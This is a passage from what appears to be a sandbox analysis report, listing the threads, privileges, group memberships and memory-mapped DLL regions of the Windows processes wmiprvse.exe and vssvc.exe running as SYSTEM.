os_tid = 0xd64 Thread: id = 70 os_tid = 0xd60 Thread: id = 71 os_tid = 0xd5c Thread: id = 72 os_tid = 0xd58 Thread: id = 73 os_tid = 0xd54 Thread: id = 74 os_tid = 0xd50 Thread: id = 101 os_tid = 0xb08 Thread: id = 115 os_tid = 0xdc8 Process: id = "6" image_name = "wmiprvse.exe" filename = 
"c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x7ef47380" os_pid = "0x488" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ae26" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1443 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1444 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1445 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1446 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" 
Region: id = 1447 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1448 start_va = 0xc0000 end_va = 0x119fff monitored = 0 entry_point = 0xfa810 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1449 start_va = 0x120000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1450 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1451 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1452 start_va = 0x1c0000 end_va = 0x1c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1453 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1454 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1455 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1456 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1457 start_va = 0x240000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private 
name = "private_0x0000000000240000" filename = "" Region: id = 1458 start_va = 0x340000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1459 start_va = 0x410000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1460 start_va = 0x520000 end_va = 0x7eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1461 start_va = 0x7f0000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1462 start_va = 0x880000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1463 start_va = 0x8d0000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1464 start_va = 0x910000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 1465 start_va = 0x950000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 1466 start_va = 0xa80000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1467 start_va = 0xac0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1468 start_va = 0xb80000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 1469 start_va = 0xc30000 end_va = 0xc6ffff 
monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 1470 start_va = 0xcd0000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1471 start_va = 0xdc0000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1472 start_va = 0x69fa0000 end_va = 0x69fdbfff monitored = 0 entry_point = 0x69fa1396 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 1473 start_va = 0x69fe0000 end_va = 0x69ff7fff monitored = 0 entry_point = 0x69fe12b0 region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 1474 start_va = 0x6fd70000 end_va = 0x6fdcbfff monitored = 0 entry_point = 0x6fd92b48 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1475 start_va = 0x6fdd0000 end_va = 0x6fdf7fff monitored = 0 entry_point = 0x6fdd1544 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 1476 start_va = 0x734a0000 end_va = 0x734aefff monitored = 0 entry_point = 0x734a7f10 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1477 start_va = 0x735b0000 end_va = 0x735c9fff monitored = 0 entry_point = 0x735c03d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1478 start_va = 0x73620000 end_va = 0x7362efff monitored 
= 0 entry_point = 0x736293d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1479 start_va = 0x73810000 end_va = 0x7381afff monitored = 0 entry_point = 0x738152a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1480 start_va = 0x73820000 end_va = 0x73837fff monitored = 0 entry_point = 0x73821335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1481 start_va = 0x73840000 end_va = 0x738e5fff monitored = 0 entry_point = 0x738aa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1482 start_va = 0x73ae0000 end_va = 0x73b40fff monitored = 0 entry_point = 0x73b1bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1483 start_va = 0x74c10000 end_va = 0x74c30fff monitored = 0 entry_point = 0x74c1145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1484 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1485 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1486 start_va = 0x75400000 end_va = 0x75416fff monitored = 0 
entry_point = 0x75403574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1487 start_va = 0x75490000 end_va = 0x754d1fff monitored = 0 entry_point = 0x75491360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1488 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1489 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1490 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1491 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1492 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1493 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1494 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = 
mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1495 start_va = 0x75f90000 end_va = 0x75f95fff monitored = 0 entry_point = 0x75f91782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1496 start_va = 0x76000000 end_va = 0x76034fff monitored = 0 entry_point = 0x7600145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1497 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1498 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1499 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1500 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1501 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1502 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" 
(normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1503 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1504 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1505 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1506 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1507 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1508 start_va = 0x778b0000 end_va = 0x778f4fff monitored = 0 entry_point = 0x778b11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1509 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1510 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1511 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1512 start_va = 0x7ffd7000 end_va = 0x7ffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1513 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1514 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1515 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1516 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1517 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1518 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1519 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1520 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 75 os_tid = 0x304 Thread: id = 76 os_tid = 0x240 Thread: id = 77 os_tid = 0x21c Thread: id = 78 os_tid = 0x234 Thread: id = 79 os_tid = 0x218 Thread: id = 80 os_tid = 0x230 Thread: id = 81 os_tid = 0x570 Thread: id = 82 os_tid = 0x424 Thread: id = 100 os_tid = 0xb18 Process: id = "7" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x7ef47c60" os_pid = "0x8e8" os_integrity_level = "0x4000" 
os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005de60" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1242 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1243 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1244 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1245 start_va = 0x40000 end_va = 0x13cfff monitored = 0 entry_point = 0xd883c region_type = mapped_file name = "vssvc.exe" filename = "\\Windows\\System32\\VSSVC.exe" (normalized: "c:\\windows\\system32\\vssvc.exe") Region: id = 1246 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1247 start_va = 0x150000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vssvc.exe.mui" filename = "\\Windows\\System32\\en-US\\VSSVC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssvc.exe.mui") Region: id = 1248 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1249 start_va = 0x180000 end_va = 0x18cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 
"setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1250 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1251 start_va = 0x1a0000 end_va = 0x1a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1252 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1253 start_va = 0x1f0000 end_va = 0x256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1254 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1255 start_va = 0x2a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1256 start_va = 0x3a0000 end_va = 0x467fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1257 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1258 start_va = 0x490000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1259 start_va = 0x5a0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1260 start_va = 0x620000 end_va 
= 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1261 start_va = 0x740000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1262 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1263 start_va = 0x8c0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 1264 start_va = 0x900000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1265 start_va = 0x940000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 1266 start_va = 0x980000 end_va = 0xc4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1267 start_va = 0xc80000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 1268 start_va = 0x6bd60000 end_va = 0x6bd66fff monitored = 0 entry_point = 0x6bd62b44 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 1269 start_va = 0x6c710000 end_va = 0x6c719fff monitored = 0 entry_point = 0x6c714aac region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1270 start_va = 0x6db70000 end_va = 0x6db7ffff monitored = 0 entry_point = 0x6db71664 region_type = mapped_file name = "xolehlp.dll" filename = 
"\\Windows\\System32\\xolehlp.dll" (normalized: "c:\\windows\\system32\\xolehlp.dll") Region: id = 1271 start_va = 0x6dc20000 end_va = 0x6dc2ffff monitored = 0 entry_point = 0x6dc21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1272 start_va = 0x6dc30000 end_va = 0x6dd45fff monitored = 0 entry_point = 0x6dc31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1273 start_va = 0x6fb50000 end_va = 0x6fb57fff monitored = 0 entry_point = 0x6fb53a49 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 1274 start_va = 0x73920000 end_va = 0x73933fff monitored = 0 entry_point = 0x73921464 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1275 start_va = 0x73940000 end_va = 0x7397afff monitored = 0 entry_point = 0x73941350 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1276 start_va = 0x73b70000 end_va = 0x73bb6fff monitored = 0 entry_point = 0x73b889f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1277 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1278 start_va = 0x73fa0000 end_va = 0x73faefff monitored = 0 entry_point = 0x73fa125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: 
"c:\\windows\\system32\\samcli.dll") Region: id = 1279 start_va = 0x73fb0000 end_va = 0x73fbefff monitored = 0 entry_point = 0x73fb12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1280 start_va = 0x73fc0000 end_va = 0x73fc8fff monitored = 0 entry_point = 0x73fc15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1281 start_va = 0x73fd0000 end_va = 0x73fe0fff monitored = 0 entry_point = 0x73fd1300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1282 start_va = 0x748b0000 end_va = 0x748c1fff monitored = 0 entry_point = 0x748b4795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1283 start_va = 0x74d50000 end_va = 0x74d58fff monitored = 0 entry_point = 0x74d51220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1284 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1285 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1286 start_va = 0x75460000 end_va = 0x7547afff monitored = 0 entry_point = 0x75461286 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1287 start_va 
= 0x754e0000 end_va = 0x754f0fff monitored = 0 entry_point = 0x754e4982 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1288 start_va = 0x756b0000 end_va = 0x756c8fff monitored = 0 entry_point = 0x756b1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1289 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1290 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1291 start_va = 0x75a80000 end_va = 0x75aa6fff monitored = 0 entry_point = 0x75a858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1292 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = 